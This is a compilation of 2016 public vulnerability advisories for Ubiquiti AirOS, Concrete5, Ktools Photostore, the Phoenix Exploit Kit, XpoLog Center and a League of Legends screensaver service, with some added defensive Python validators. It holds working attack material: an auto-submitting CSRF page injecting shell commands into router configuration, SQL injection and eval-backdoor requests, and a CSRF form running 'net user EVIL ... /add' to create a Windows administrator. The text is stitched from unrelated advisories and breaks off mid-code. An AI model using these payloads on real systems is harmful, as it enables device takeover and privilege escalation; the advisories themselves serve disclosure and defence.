Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
The administration portal does not issue a randomized CSRF
token either per session, page, or request. Administration
authorization is solely based on cookie control. Therefore,
it is possible to embed JavaScript into an HTML page so when
an administrator is socially engineered into visiting the page,
the target device will be accessed with privileges.
Device configuration POST parameters include tokens passed to
operating system commands run as root in unsafe ways with
insufficient input sanitization. Command injection is possible
by stacking shell commands in parameters such as
iptables.1.cmd.
To reproduce this finding, follow these steps.
a. Authenticate to the target web application and navigate to the
SYSTEM page.
b. Download the current configuration.
c. Open the configuration in an editor of your choice, navigate to the
line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT
d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt
e. Save the changes, and submit the modified configuration. Apply the
changes using apply.cgi afterward.
Example:
POST /system.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426; AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------4384928471732886672453075690
Content-Length: 7204
...
iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
...
GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
Host: 192.168.1.1
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426; AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
f. Change your IP address, but ensure continued routing to the target web
application. Incrementing the last octet is sufficient.
g. Open the configuration in an editor of your choice, navigate to the
modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt
h. Repeat step e from the new IP address. You will receive the same
response. Apply the changes using the apply.cgi file.
i. Login to the target device using SSH or telnet, navigate to /var/tmp
and type ls.
j. You'll discover both files exist.
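An added example, not KoreLogic's PoC and not Ubiquiti firmware code: a validator for the uploaded key=value configuration that rejects any iptables.N.cmd value containing more than plain iptables arguments, and runs accepted rules as argument vectors rather than through a shell. Python stands in for the device's apply path, which the advisory does not show; the sample configurations are constructed around the injected line above.

```python
"""Validate iptables.N.cmd entries of an AirOS-style config before execution."""
import re
import subprocess

CMD_KEY = re.compile(r"^iptables\.(\d+)\.cmd$")
# Tokens a firewall rule legitimately contains: options, chain and target
# names, addresses, ports, '!' for negation. Shell metacharacters (; | & ` $,
# quotes, parentheses, newlines) are deliberately absent from the class.
SAFE_TOKEN = re.compile(r"^[A-Za-z0-9_.:/,=!-]+$")


class ConfigError(ValueError):
    pass


def parse_config(text):
    """One key=value per line, as in the uploaded cfgfile; later keys win."""
    cfg = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        key, sep, value = line.partition("=")
        if not sep or not re.fullmatch(r"[A-Za-z0-9_.-]+", key):
            raise ConfigError(f"line {lineno}: malformed entry")
        cfg[key] = value
    return cfg


def firewall_argv(cfg):
    """Validate every iptables.N.cmd value (enabled or not) and return the
    argument vectors for the enabled ones; raise ConfigError on a bad token."""
    rules = []
    for key, value in cfg.items():
        if not CMD_KEY.match(key):
            continue
        tokens = value.split()
        bad = [t for t in tokens if not SAFE_TOKEN.match(t)]
        if bad:
            raise ConfigError(f"{key}: disallowed token(s) {bad}")
        if cfg.get(key[:-4] + ".status", "enabled") == "enabled":
            rules.append(["iptables"] + tokens)
    return rules


def is_safe_config(text):
    """True when the whole configuration parses and no rule needs rejecting."""
    try:
        firewall_argv(parse_config(text))
    except ConfigError:
        return False
    return True


def apply_firewall(cfg, run=subprocess.run):
    """Execute each rule as an argv list: with no shell involved, ';' is just
    another character in an argument and can never start a second command."""
    for argv in firewall_argv(cfg):
        run(argv, check=True)


# Constructed samples: the second carries the injected line from the steps above.
CLEAN_CFG = (
    "iptables.status=enabled\n"
    "iptables.1.status=enabled\n"
    "iptables.1.cmd=-A FIREWALL -j ACCEPT\n"
)
INJECTED_CFG = (
    "iptables.status=enabled\n"
    "iptables.1.status=enabled\n"
    "iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt\n"
)

if __name__ == "__main__":
    print("clean config accepted:", is_safe_config(CLEAN_CFG))
    print("injected config accepted:", is_safe_config(INJECTED_CFG))
```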
4. Mitigation and Remediation Recommendation
At this time there is no vendor patch for this vulnerability.
The vendor was unable or unwilling to communicate an expected release
date for a proper mitigation.
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.02.25 - KoreLogic sends vulnerability report and PoC to Ubiquiti.
2016.02.26 - Ubiquiti acknowledges receipt of vulnerability report.
2016.04.12 - 30 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.04.21 - KoreLogic asks for an update on the remediation effort.
2016.04.29 - Ubiquiti replies that the patch will require
"significant changes" but does not provide an estimate
of the release time table.
2016.05.04 - 45 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.05.12 - KoreLogic requests an update from Ubiquiti.
2016.05.23 - KoreLogic requests an update from Ubiquiti.
2016.06.23 - 80 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.06.28 - Public disclosure.
7. Proof of Concept
########################################################################
#
# Copyright 2016 KoreLogic Inc., All Rights Reserved.
#
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
#
# http://creativecommons.org/licenses/by-sa/4.0/
#
########################################################################
This example has been performed against the AirGateway device running the
1.1.6 firmware version. In order to recreate this vulnerability on
AirFiber and mFi, the attacker should first obtain a valid copy of the
device configuration and update this proof-of-concept code.
-->
<html>
<body>
<form action="https://192.168.1.1/apply.cgi" id="airos-exploit-apply">
<input type="submit" value="Submit request" />
</form>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.1.1/system.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------761818923593135447208368355");
xhr.withCredentials = true;
var body = "-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"fwfile\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"fwupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"update_status\"\r\n" +
"\r\n" +
"enabled\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"hostname\"\r\n" +
"\r\n" +
"airGateway\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"timezone\"\r\n" +
"\r\n" +
"GMT\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"ui_language\"\r\n" +
"\r\n" +
"en_US\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"adminname\"\r\n" +
"\r\n" +
"ubnt\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"latitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgfile\"; filename=\"hacked.cfg\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"aaa.1.radius.acct.1.status=disabled\n" +
"wpasupplicant.status=disabled\n" +
"wpasupplicant.device.1.status=disabled\n" +
"wireless.status=enabled\n" +
"wireless.1.wds.status=disabled\n" +
"wireless.1.wds.6.peer=\n" +
"wireless.1.wds.5.peer=\n" +
"wireless.1.wds.4.peer=\n" +
"wireless.1.wds.3.peer=\n" +
"wireless.1.wds.2.peer=\n" +
"wireless.1.wds.1.peer=\n" +
"wireless.1.status=enabled\n" +
"wireless.1.ssid=www.ubnt.com\n" +
"wireless.1.security.type=none\n" +
"wireless.1.scan_list.status=disabled\n" +
"wireless.1.mac_acl.policy=allow\n" +
"wireless.1.mac_acl.status=disabled\n" +
"wireless.1.hide_ssid=disabled\n" +
"wireless.1.devname=ath0\n" +
"wireless.1.autowds=disabled\n" +
"wireless.1.authmode=1\n" +
"wireless.1.ap=\n" +
"wireless.1.addmtikie=enabled\n" +
"vlan.status=disabled\n" +
"users.status=enabled\n" +
"users.1.status=enabled\n" +
"users.1.password=VvpvCwhccFv6Q\n" +
"users.1.name=ubnt\n" +
"upnpd.devname=\n" +
"upnpd.status=disabled\n" +
"tshaper.status=disabled\n" +
"telnetd.status=enabled\n" +
"telnetd.port=23\n" +
"system.modules.blacklist.status=disabled\n" +
"system.eirp.status=disabled\n" +
"system.cfg.version=65542\n" +
"syslog.status=disabled\n" +
"syslog.remote.status=\n" +
"sshd.status=enabled\n" +
"sshd.port=22\n" +
"sshd.auth.passwd=enabled\n" +
"snmp.status=disabled\n" +
"route.1.devname=eth0\n" +
"route.1.status=disabled\n" +
"route.1.comment=\n" +
"route.1.gateway=0.0.0.0\n" +
"route.1.netmask=0\n" +
"route.1.ip=0.0.0.0\n" +
"route.status=enabled\n" +
"resolv.nameserver.2.status=enabled\n" +
"resolv.nameserver.2.ip=\n" +
"resolv.nameserver.1.status=enabled\n" +
"resolv.nameserver.1.ip=\n" +
"resolv.status=disabled\n" +
"radio.status=enabled\n" +
"radio.countrycode=840\n" +
"radio.1.txpower=18\n" +
"radio.1.subsystemid=0xe4c2\n" +
"radio.1.status=enabled\n" +
"radio.1.reg_obey=disabled\n" +
"radio.1.rate.mcs=7\n" +
"radio.1.rate.auto=enabled\n" +
"radio.1.obey=disabled\n" +
"radio.1.mode=master\n" +
"radio.1.mcastrate=\n" +
"radio.1.low_txpower_mode=disabled\n" +
"radio.1.ieee_mode=11nght20\n" +
"radio.1.freq=0\n" +
"radio.1.forbiasauto=1\n" +
"radio.1.dfs.status=enabled\n" +
"radio.1.devname=ath0\n" +
"radio.1.cwm.mode=0\n" +
"radio.1.cwm.enable=0\n" +
"radio.1.countrycode=840\n" +
"radio.1.clksel=1\n" +
"radio.1.chanshift=\n" +
"radio.1.chanbw=0\n" +
"radio.1.antenna.id=4\n" +
"radio.1.acktimeout=25\n" +
"radio.1.ackdistance=600\n" +
"pwdog.status=enabled\n" +
"pwdog.retry=3\n" +
"pwdog.period=300\n" +
"pwdog.host=8.8.8.8\n" +
"pwdog.delay=300\n" +
"ppp.status=disabled\n" +
"ntpclient.status=enabled\n" +
"ntpclient.1.status=enabled\n" +
"ntpclient.1.server=0.ubnt.pool.ntp.org\n" +
"netmode=soho\n" +
"netconf.5.up=enabled\n" +
"netconf.5.hwaddr.mac=\n" +
"netconf.5.hwaddr.status=disabled\n" +
"netconf.5.autoip.status=disabled\n" +
"netconf.5.role=mlan\n" +
"netconf.5.mtu=1500\n" +
"netconf.5.devname=eth0\n" +
"netconf.5.status=disabled\n" +
"netconf.4.up=enabled\n" +
"netconf.4.netmask=255.255.255.0\n" +
"netconf.4.ip=0.0.0.0\n" +
"netconf.4.hwaddr.mac=\n" +
"netconf.4.hwaddr.status=disabled\n" +
"netconf.4.autoip.status=disabled\n" +
"netconf.4.role=bridge_port\n" +
"netconf.4.mtu=1500\n" +
"netconf.4.devname=eth1\n" +
"netconf.4.status=enabled\n" +
"netconf.3.up=enabled\n" +
"netconf.3.netmask=255.255.255.0\n" +
"netconf.3.ip=192.168.1.1\n" +
"netconf.3.hwaddr.mac=\n" +
"netconf.3.hwaddr.status=disabled\n" +
"netconf.3.autoip.status=disabled\n" +
"netconf.3.role=lan\n" +
"netconf.3.mtu=1500\n" +
"netconf.3.devname=br0\n" +
"netconf.3.status=enabled\n" +
"netconf.2.up=enabled\n" +
"netconf.2.promisc=enabled\n" +
"netconf.2.netmask=255.255.255.0\n" +
"netconf.2.ip=0.0.0.0\n" +
"netconf.2.hwaddr.mac=\n" +
"netconf.2.hwaddr.status=disabled\n" +
"netconf.2.autoip.status=disabled\n" +
"netconf.2.role=bridge_port\n" +
"netconf.2.mtu=1500\n" +
"netconf.2.devname=ath0\n" +
"netconf.2.status=enabled\n" +
"netconf.1.up=enabled\n" +
"netconf.1.promisc=enabled\n" +
"netconf.1.netmask=255.255.255.0\n" +
"netconf.1.ip=0.0.0.0\n" +
"netconf.1.hwaddr.mac=\n" +
"netconf.1.hwaddr.status=disabled\n" +
"netconf.1.autoip.status=disabled\n" +
"netconf.1.role=wan\n" +
"netconf.1.mtu=1500\n" +
"netconf.1.devname=eth0\n" +
"netconf.1.status=enabled\n" +
"netconf.status=enabled\n" +
"iptables.sys.upnpd.devname=\n" +
"iptables.sys.upnpd.status=disabled\n" +
"iptables.sys.status=enabled\n" +
"iptables.sys.portfw.status=disabled\n" +
"iptables.sys.mgmt.status=disabled\n" +
"iptables.sys.masq.1.status=enabled\n" +
"iptables.sys.masq.1.devname=eth0\n" +
"iptables.sys.masq.status=enabled\n" +
"iptables.sys.fw.status=disabled\n" +
"iptables.sys.dmz.status=disabled\n" +
"iptables.1.comment=\n" +
"iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/hacked.txt\n" +
"iptables.1.status=enabled\n" +
"iptables.status=enabled\n" +
"igmpproxy.status=enabled\n" +
"igmpproxy.upstream.devname=eth0\n" +
"igmpproxy.1.downstream.devname=br0\n" +
"httpd.status=enabled\n" +
"httpd.session.timeout=900\n" +
"httpd.port=80\n" +
"httpd.https.status=enabled\n" +
"httpd.https.port=443\n" +
"gui.wlan.advanced.status=disabled\n" +
"gui.network.advanced.status=enabled\n" +
"ebtables.sys.vlan.status=disabled\n" +
"ebtables.sys.status=enabled\n" +
"ebtables.sys.eap.status=disabled\n" +
"ebtables.sys.eap.1.status=enabled\n" +
"ebtables.sys.eap.1.devname=ath0\n" +
"ebtables.sys.arpnat.status=disabled\n" +
"ebtables.sys.arpnat.1.status=enabled\n" +
"ebtables.sys.arpnat.1.devname=ath0\n" +
"ebtables.status=enabled\n" +
"dyndns.status=disabled\n" +
"dnsmasq.status=disabled\n" +
"dnsmasq.1.status=disabled\n" +
"dnsmasq.1.devname=eth0\n" +
"discovery.status=enabled\n" +
"discovery.cdp.status=enabled\n" +
"dhcpd.1.start=192.168.1.2\n" +
"dhcpd.1.netmask=255.255.255.0\n" +
"dhcpd.1.lease_time=600\n" +
"dhcpd.1.end=192.168.1.254\n" +
"dhcpd.1.dnsproxy=enabled\n" +
"dhcpd.1.devname=br0\n" +
"dhcpd.1.dns.2.status=disabled\n" +
"dhcpd.1.dns.2.server=\n" +
"dhcpd.1.dns.1.status=disabled\n" +
"dhcpd.1.dns.1.server=\n" +
"dhcpd.1.status=enabled\n" +
"dhcpd.status=enabled\n" +
"dhcpc.1.status=enabled\n" +
"dhcpc.1.fallback_netmask=255.255.255.0\n" +
"dhcpc.1.fallback=192.168.10.1\n" +
"dhcpc.1.devname=eth0\n" +
"dhcpc.status=enabled\n" +
"bridge.1.fd=1\n" +
"bridge.1.comment=\n" +
"bridge.1.port.2.devname=eth1\n" +
"bridge.1.port.2.status=enabled\n" +
"bridge.1.port.1.devname=ath0\n" +
"bridge.1.port.1.status=enabled\n" +
"bridge.1.stp.status=disabled\n" +
"bridge.1.devname=br0\n" +
"bridge.1.status=enabled\n" +
"bridge.status=enabled\n" +
"aaa.status=disabled\n" +
"aaa.1.status=disabled\n" +
"aaa.1.radius.macacl.status=disabled\n" +
"aaa.1.radius.auth.1.status=disabled\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgupload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"cfgupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"systemdate\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
document.getElementById("airos-exploit-apply").submit();
</script>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
-------------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
-------------------------------------------------------------------------------
[-] Software Link:
https://www.concrete5.org/
[-] Affected Versions:
Version 5.7.3.1 and probably other versions.
[-] Vulnerability Description:
The vulnerable code is located within the "Application::dispatch()" method:
public function dispatch(Request $request)
{
    if ($this->installed) {
        $response = $this->getEarlyDispatchResponse();
    }
    if (!isset($response)) {
        $collection = Route::getList();
        $context = new \Symfony\Component\Routing\RequestContext();
        $context->fromRequest($request);
        $matcher = new UrlMatcher($collection, $context);
        // getPathInfo() may be derived from a client-supplied header (see below)
        $path = rtrim($request->getPathInfo(), '/') . '/';
        try {
            $request->attributes->add($matcher->match($path));
            $matched = $matcher->match($path);
            $route = $collection->get($matched['_route']);
            Route::setRequest($request);
            $response = Route::execute($route, $matched);
The vulnerability exists because the path for the incoming request is retrieved using the
"Request::getPathInfo()" method from the Symfony framework, which allows the request path
to be specified within certain HTTP headers (such as "X-Original-URL" and some others). So it
might be possible to specify paths containing "dot-dot-slash" sequences without worrying about
the URL encoding and path normalization done by the web server. This could be exploited by
unauthenticated attackers to include arbitrary .php files located outside the Concrete5 root
directory, or from the Concrete5 codebase itself (potentially leading to unauthorized access to
certain functionalities), by sending an HTTP request like this:
GET /concrete5/index.php HTTP/1.1
Host: localhost
X-Original-Url: /tools/../../index
Connection: keep-alive
The dispatching process for this request will try to re-include the index.php file,
and this will end up with an unexpected error.
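To make the header-override behaviour concrete, here is an added Python check (not part of the advisory or of Concrete5) that reproduces how the routed path is chosen and flags requests where an override header carries a dot-dot-slash sequence. It assumes the header names X-Original-URL (named above) and X-Rewrite-URL (the other IIS rewrite header Symfony's prepareRequestUri() consulted in the same way); the sample request is the one from the advisory.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Headers that Symfony HttpFoundation's Request::prepareRequestUri() consulted
# ahead of REQUEST_URI. X-Original-URL is the one named in the advisory;
# X-Rewrite-URL is the other IIS rewrite header it accepted the same way.
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def routed_path(request_target, headers):
    """Return (path the framework will route on, header that supplied it or None).

    Mirrors the precedence the advisory describes: when an override header is
    present it replaces the request-line path entirely, so the web server's
    own normalisation of the request line never touched it.
    """
    lowered = {name.lower(): value for name, value in headers.items()}
    for name in OVERRIDE_HEADERS:
        if name in lowered:
            return urlsplit(lowered[name]).path, name
    return urlsplit(request_target).path, None


def escapes_root(path):
    """True when resolving the '..' segments climbs above the routing root."""
    depth = 0
    for segment in unquote(path).split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def normalised(path):
    """The path a file include would actually resolve, after percent-decoding."""
    decoded = unquote(path)
    if not decoded.startswith("/"):
        decoded = "/" + decoded
    return posixpath.normpath(decoded)


def assess(request_target, headers):
    """Classify one request; usable as a reverse-proxy rule or in log review."""
    path, source = routed_path(request_target, headers)
    findings = []
    if source is not None:
        findings.append("path supplied by %s header" % source)
    if ".." in unquote(path).split("/"):
        findings.append("dot-dot segment in routed path")
    if escapes_root(path):
        findings.append("traversal climbs above routing root")
    return {"routed_path": path, "resolves_to": normalised(path), "findings": findings}


if __name__ == "__main__":
    # The request from the advisory, as a constructed sample.
    sample_headers = {"Host": "localhost", "X-Original-Url": "/tools/../../index"}
    print(assess("/concrete5/index.php", sample_headers))
    # The same request line without the override header routes normally.
    print(assess("/concrete5/index.php", {"Host": "localhost"}))
```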
[-] Solution:
Update to a fixed version.
[-] Disclosure Timeline:
[05/05/2015] - Vulnerability details sent through HackerOne
[02/10/2015] - CVE number requested
[19/12/2015] - Vulnerability fixed on the GitHub repository
[26/06/2016] - Vulnerability publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-10
[-] Other References:
https://hackerone.com/reports/59665
Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
CVE-ID : CVE-2016-4337
Google Dork: inurl:mgr.login.php
Product : Photostore
Affected : Versions prior to 4.7.5
Impact : Critical
Remote : Yes
Website link: http://www.ktools.net
Reported : 02/06/2016
Authors : Gal Goldshtein and Viktor Minin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
No authentication (login) is required to exploit this vulnerability.
The Photostore application's password recovery module is prone to a blind SQL injection attack.
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
Vulnerable code is located in the mgr.login.php file:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
case 'recover_login': {
    // $_POST['email'] is concatenated straight into the query string
    $result = mysqli_query( $db, 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
    $returned_rows = mysqli_num_rows( $result );
    $db_admin_user = mysqli_fetch_array( $result );
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PoC:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
Host: victim.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
email=%27%20[SQL PAYLOAD];#
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
# Vuln file : geoip.php
492. isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();
# Screen : http://i.imgur.com/E7RBBRk.png
__END__
XpoLog Center V6 CSRF Remote Command Execution
Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
6.4254
6.4252
6.4250
6.4237
6.4235
5.4018
Summary: Applications Log Analysis and Management Platform.
Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue through the task tool feature by adding a
task that runs a chosen binary with the supplied arguments. In
combination with the CSRF, an attacker can execute system commands
with SYSTEM privileges.
Tested on: Apache-Coyote/1.1
Microsoft Windows Server 2012
Microsoft Windows 7 Professional SP1 EN 64bit
Java/1.7.0_45
Java/1.8.0.91
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php
14.06.2016
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
<html>
<body>
<form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
<input type="hidden" name="" value="" />
<input type="hidden" name="csrfToken" value="NoToken" />
<input type="hidden" name="taskId" value="1465930398522" />
<input type="hidden" name="taskType" value="exe" />
<input type="hidden" name="name" value="CCMMDD" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="IsSsh" value="false" />
<input type="hidden" name="exePath" value="&quot;c:\\windows\\system32\\cmd.exe&quot;" />
<input type="hidden" name="exeArgs" value="&quot;/C net user EVIL pass123 /add &amp; net localgroup Administrators EVIL /add&quot;" />
<input type="hidden" name="exeEnvVar" value="" />
<input type="hidden" name="exeWorkDir" value="" />
<input type="hidden" name="exeOutputTargetFile" value="" />
<input type="hidden" name="NameXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="IdXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="actionIdXpoTaskSched" value="0" />
<input type="hidden" name="StateXpoTaskSched" value="1" />
<input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
<input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
<input type="hidden" name="minutesXpoTaskSched" value="0" />
<input type="hidden" name="minutesEndXpoTaskSched" value="0" />
<input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
<input type="hidden" name="frequencyXpoTaskSched" value="daily" />
<input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
<input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
<input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
<input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
<input type="hidden" name="hoursXpoTaskSched" value="0" />
<input type="hidden" name="hoursEndXpoTaskSched" value="0" />
<input type="hidden" name="hoursOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="minutesOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="secondsOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="jobPriority" value="-1" />
<input type="hidden" name="ajaxTimestamp" value="1465930905166" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
GET http://10.0.0.17:30303/logeye/testingus.txt
Response:
nt authority\system
# Exploit Title: League of Legends Screensaver Unquoted Service Paths Conditional Privilege Escalation.
# CVE-ID: NA
# Date: 13/04/2016
# Exploit Author: Vincent Yiu
# Contact: vysec.private@gmail.com
# Vendor Homepage: http://www.leagueoflegends.com
# Software Link: screensaver.euw.leagueoflegends.com/en_US
# Version: MD5 Hash: 0C1B02079CA8BF850D59DD870BC09963
# Tested on: Windows 7 Professional x64 fully updated.
1. Description:
The League of Legends installer would install the League of Legends
screensaver along with a service. The service would be called
'lolscreensaver'. This particular service was misconfigured such that
the service binary path was unquoted. When the screensaver is
installed to 'C:\Riot Games', the issue is not exploitable. However,
during the installation process, users are able to specify a directory
to install to. When a user chooses to install this to say an external
drive, this becomes exploitable.
This was reported to Riot Games and has been rectified in the latest version.
2. Proof
http://i.imgur.com/S2fuUKa.png
3. Exploit:
Simply run 'sc qc lolscreensaver' and check for unquoted service path.
If the path is unquoted, then check the permissions of each directory
using space as a token.
Eg. D:\My Games\Hidden Files\Super Secure\Riot Games\service\service.exe
Do icacls on D:\, 'D:\My Games\', 'D:\My Games\Hidden Files\', 'D:\My
Games\Hidden Files\Super Secure\'. If you are able to write files to
any of these directories, it is exploitable.
If 'D:\My Games\' is writable, to exploit this issue, place a binary
to run as SYSTEM into that folder, named 'Hidden.exe'.
This is released on exploit-db as a means to make users aware. There was no way to automatically install a patch or update to fix this issue. It is recommended that the screensaver is uninstalled and redownloaded from the official website where this issue is now resolved.
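The triage steps above can be automated. The following Python helper is an added example (not Vincent Yiu's code) that reads BINARY_PATH_NAME out of `sc qc` output and lists, in the order Windows would try them, the executable names and the parent directories whose ACLs need checking with icacls. The `sc qc` output it parses is a constructed sample that uses the path from the advisory.

```python
import re

# Constructed sample of `sc qc lolscreensaver` output: the field names are the
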